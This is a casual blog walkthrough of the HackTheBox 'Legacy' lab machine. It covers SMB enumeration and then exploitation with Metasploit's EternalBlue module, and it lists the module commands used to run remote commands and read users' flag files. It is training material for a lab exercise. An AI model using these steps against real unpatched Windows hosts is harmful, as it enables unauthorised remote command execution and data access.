This is going to be a fast walkthrough. Nothing fancy here, I’m just going to switch over from vulnhub boxes to hackthebox boxes and I wanted to start with an easy one.

Many of these machines I have already rooted, like this one here.

Legacy’s only real challenge is if you want to run non-metasploit exploits against it. For some reason I was having a super difficult time getting the exploit-db python exploits to run on my Parrot-OS instance.

The exploits weren’t built for python3 and I didn’t want to waste time trying to convert them. So naturally I tried using python2 which is also installed but when I went to pip install the missing modules, pip2 wasn’t installed and apt-cache didn’t have any available for download! lol

So I decided to just MSF this box and move on.

Exploiting Legacy

Well before we can exploit it, we need to see what services it has running.

Looks like just an smb server is running.

Next I run enum4linux against the target to see what info we can rip out of it

Not a ton of super useful info other than there’s no null sessions available so I guess we can rule that one out.

This leads me to believe that since this is supposed to be an easy box they’re probably looking for something simple like the Eternal Blue exploit.

Now I tried using the exploit-db exploits. Maybe it’s too late or I’m too lazy but I didn’t feel like upgrading exploits to work with python3 lmao

So I took the easy route and went with Metasploit for this box

HackTheBox – Legacy – Walkthrough

search eternal

use 3

set RHOSTS 10.10.10.4

set command dir

run

Looks like it’s vulnerable and that we got command execution. We’re sitting in the System32 directory.

set COMMAND systeminfo

Now it’s just a matter of finding our flags

set COMMAND dir "c:\Documents and Settings\"

We’ll try and get john’s flag first. It’s usually on the desktop for windows machines

set COMMAND dir "c:\Documents and Settings\john\Desktop

Yup, there it is. Now we can get it by just typing it out

set COMMAND type "c:\Documents and Settings\john\Desktop\user.txt

Next we’ll see if we can get our admin flag

set COMMAND dir "c:\Documents and Settings\Administrator\Desktop

That’s it!

Not a ton to say about this box. Not really that difficult to do with metasploit. Maybe I’ll switch OS’s and see if I can get the manual exploits to work on Kali

Leave a Reply

five + 19 =